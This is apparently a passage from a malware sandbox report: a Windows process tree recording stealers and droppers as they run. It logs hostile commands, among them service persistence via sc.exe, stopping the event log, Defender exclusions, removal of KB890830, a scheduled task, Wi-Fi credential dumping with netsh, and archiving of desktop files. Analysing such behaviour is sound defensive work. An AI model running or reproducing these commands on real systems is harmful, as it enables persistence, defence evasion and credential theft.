    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6236
  - - C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
      4⤵
      PID:4000
  - - C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
      4⤵
      PID:2460
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6620
- C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe
  "C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe"
  2⤵
  PID:6100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1548
- C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
  "C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
  2⤵
  PID:3832
- - C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
    "C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
    3⤵
    PID:7988
- C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe
  "C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
  2⤵
  PID:1464
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "FLWCUERA"
    3⤵
    - Launches sc.exe
    PID:8884
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:8068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
    3⤵
    PID:2776
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:1436
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "FLWCUERA"
    3⤵
    - Launches sc.exe
    PID:5352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000564041\do.ps1"
  2⤵
  PID:9212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3⤵
    PID:2036
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
      4⤵
      PID:8312
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:2
      4⤵
      PID:7404
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1856 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
      4⤵
      PID:6956
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
      4⤵
      PID:8096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
      4⤵
      PID:6200
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3056 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
      4⤵
      PID:6324
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3844 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
      4⤵
      PID:2624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3⤵
    PID:8612
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:5684
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.0.275686909\1355031572" -parentBuildID 20221007134813 -prefsHandle 1584 -prefMapHandle 1576 -prefsLen 20804 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5abd596c-eb87-4189-936b-7899e544fd2e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 1748 24bc70e6b58 gpu
        5⤵
        
        PID:7012
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.1.2003993816\1855881379" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20804 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d58bfe5-6307-4d33-a35f-fb503dc95c75} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2108 24bc75e1f58 socket
        5⤵
        
        PID:9192
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.2.655256079\1778261005" -childID 1 -isForBrowser -prefsHandle 2928 -prefMapHandle 2924 -prefsLen 22021 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5d163a-1757-40d9-9cd0-b3bb3cd008b5} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2940 24bca880558 tab
        5⤵
        
        PID:392
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.3.561617980\117726505" -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 26427 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f608c594-d01a-4cdf-a9ee-1e087ad73501} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 3468 24bb3f62b58 tab
        5⤵
        
        PID:1704
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.4.287277354\1800174919" -childID 3 -isForBrowser -prefsHandle 4900 -prefMapHandle 4888 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd4df618-05ae-4ff0-834e-39f6601cedb9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 4908 24bcec42058 tab
        5⤵
        
        PID:6380
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.5.2009227957\796973654" -parentBuildID 20221007134813 -prefsHandle 5212 -prefMapHandle 5208 -prefsLen 26486 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb1ae83d-5221-41d4-bb34-1b5e6e8f21aa} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5244 24bcf1cae58 rdd
        5⤵
        
        PID:3464
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.6.1883631940\1970643758" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5300 -prefMapHandle 5244 -prefsLen 26486 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f7bc680-cbb4-4054-a5a9-566ba81216bf} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5392 24bcf1c7e58 utility
        5⤵
        
        PID:5508
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.9.1388435135\1378157438" -childID 6 -isForBrowser -prefsHandle 5888 -prefMapHandle 5892 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3d5abc3-e937-429f-a294-f7ee2687c317} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5880 24bcf1c9958 tab
        5⤵
        
        PID:6684
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.8.1828702560\1670586747" -childID 5 -isForBrowser -prefsHandle 5696 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a440858-8b1c-4e2a-8303-06f8cfb47e9e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5688 24bcf1c8a58 tab
        5⤵
        
        PID:1948
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.7.1883471339\268086337" -childID 4 -isForBrowser -prefsHandle 5544 -prefMapHandle 5264 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e1ace20-eab0-44f3-9cbe-fbbc77f222e3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5556 24bce9e0658 tab
        5⤵
        
        PID:5816
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.10.808435501\1696470453" -childID 7 -isForBrowser -prefsHandle 5864 -prefMapHandle 5544 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2625ed8-c874-43c8-8d53-dc1329b17134} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5768 24bb3f68158 tab
        5⤵
        
        PID:8660
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.11.285895284\63954093" -childID 8 -isForBrowser -prefsHandle 6416 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {114ba84e-8841-4789-b131-8224bb4accd1} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 6196 24bcc56b858 tab
        5⤵
        
        PID:8800
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login
    3⤵
    PID:5392
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
      4⤵
      PID:5304
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1904 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:8
      4⤵
      PID:5100
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:2
      4⤵
      PID:2396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
    3⤵
    PID:6828
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
      4⤵
      PID:5928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
    3⤵
    PID:4272
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
      4⤵
      PID:6124
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:2
      4⤵
      PID:2984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
      4⤵
      PID:6192
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
      4⤵
      PID:2216
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3864 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
      4⤵
      PID:2136
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
      4⤵
      PID:8764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
      4⤵
      PID:8392
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4708 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
      4⤵
      PID:9204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
    3⤵
    PID:3760
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
      4⤵
      PID:8120
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3⤵
    PID:8676
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
      4⤵
      PID:8692
- C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe
  "C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe"
  2⤵
  PID:6496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5756
- C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe
  "C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
  2⤵
  PID:2268
- - C:\Users\Admin\AppData\Local\Temp\onefile_2268_133529879094912185\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
    3⤵
    PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:6248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:1468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:7732
- C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe
  "C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe"
  2⤵
  PID:5256
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "THYAWYFT"
    3⤵
    - Launches sc.exe
    PID:2212
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1268
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "THYAWYFT"
    3⤵
    - Launches sc.exe
    PID:7736
- C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe
  "C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe"
  2⤵
  PID:5008
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:5204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:7764
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4984
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:1888
- - C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
    C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
    3⤵
    PID:6292
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 1388
      4⤵
      Program crash
      PID:6816
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4316

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2169.dll
1⤵
PID:7748
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\2169.dll
  2⤵
  PID:7772

C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
1⤵
PID:3976
- C:\Users\Admin\AppData\Local\Temp\2E6A.exe
  C:\Users\Admin\AppData\Local\Temp\2E6A.exe
  2⤵
  PID:6640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5560 -ip 5560
1⤵
PID:4000

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
1⤵
PID:2984
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\002246581151_Desktop.zip' -CompressionLevel Optimal
  2⤵
  PID:8436

C:\Users\Admin\AppData\Local\Temp\578E.exe
C:\Users\Admin\AppData\Local\Temp\578E.exe
1⤵
PID:580

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1216

C:\Users\Admin\AppData\Local\Temp\6933.exe
C:\Users\Admin\AppData\Local\Temp\6933.exe
1⤵
PID:6480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5520 -ip 5520
1⤵
PID:1440

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004E8
1⤵
PID:8308

C:\Users\Admin\AppData\Local\Temp\A766.exe
C:\Users\Admin\AppData\Local\Temp\A766.exe
1⤵
PID:5876
- C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
  "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:7068
- - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
    "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
    3⤵
    PID:7188
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:4584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 848
    3⤵
    - Program crash
    PID:8960
- C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
  2⤵
  PID:8812
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:5452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:1500
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:6712
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:8864
- - C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
    C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
    3⤵
    PID:8452
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8452 -s 2476
      4⤵
      Program crash
      PID:8824
- C:\Users\Admin\AppData\Local\Temp\FourthX.exe
  "C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
  2⤵
  PID:2820
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:8864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3344
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6168
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "UTIXDCVF"
    3⤵
    - Launches sc.exe
    PID:3208
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:7916
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "UTIXDCVF"
    3⤵
    - Launches sc.exe
    PID:8844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 8792 -ip 8792
1⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
1⤵
PID:7376
- C:\Windows\SysWOW64\WerFault.exe
